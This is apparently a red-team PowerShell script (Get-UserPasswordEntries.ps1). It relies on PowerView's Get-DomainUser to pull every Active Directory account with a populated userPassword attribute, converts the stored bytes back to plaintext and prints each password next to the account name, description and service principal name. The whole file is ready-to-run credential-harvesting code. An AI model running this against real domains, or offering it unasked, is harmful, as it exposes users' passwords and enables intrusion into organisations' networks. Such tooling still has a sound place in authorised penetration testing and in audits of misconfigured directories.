Get-UserPasswordEntries - Red-Teaming script intended to look through Active Directory's LDAP/GlobalCatalog and extract every user having set userPassword property. Then to decode that property.

Get-UserPasswordEntries.ps1

<#
  This script enumerates user accounts in Active Directory and then collects
  their .userPassword properties, decodes them and prints out.
 
  Assuming we have PowerView's Get-DomainUser command available.

  Usage:
    PS> . .\Get-UserPasswordEntries.ps1
    PS> Get-UserPasswordEntries
  
  Mariusz B. / mgeeky
#>

# This script requires PowerView 3.0 dev branch
# Import-Module powerview.ps1 -ErrorAction SilentlyContinue

Function Get-UserPasswordEntries 
{
    $num = 0

    Get-DomainUser -Filter "(userpassword=*)" -Properties * | % {
        $entry = $_
        $passw = $entry | Select -ExpandProperty userpassword
        $passw2 = $passw | % {[char][int]$_}
        $passw3 = $passw2 -join ''
        $name1 = $entry.samaccountname
        try {
            $desc = $entry.description
        }
        catch {
            $desc = "<empty>"
        }
        
        try {
            $name3 = $entry.serviceprincipalname
        }
        catch {
            $name3 = "<empty>"
        }

        $num += 1

        $obj = @{
            SamAccountName = $name1
            ServicePrincipalName = $name3
            Description = $desc
            UserPassword = $passw3
        }
        $object = new-object psobject -Property $obj
        
        Write-Host $num".)"
        Write-Host "SamAccountName:`t`t" $object.SamAccountName
        Write-Host "Description:`t`t" $object.Description
        Write-Host "ServicePrincipalName:`t" $object.ServicePrincipalName
        Write-Host "UserPassword:`t`t" $object.UserPassword
        Write-Host
    }

    Write-Host "Found in total: "$num" entries."
}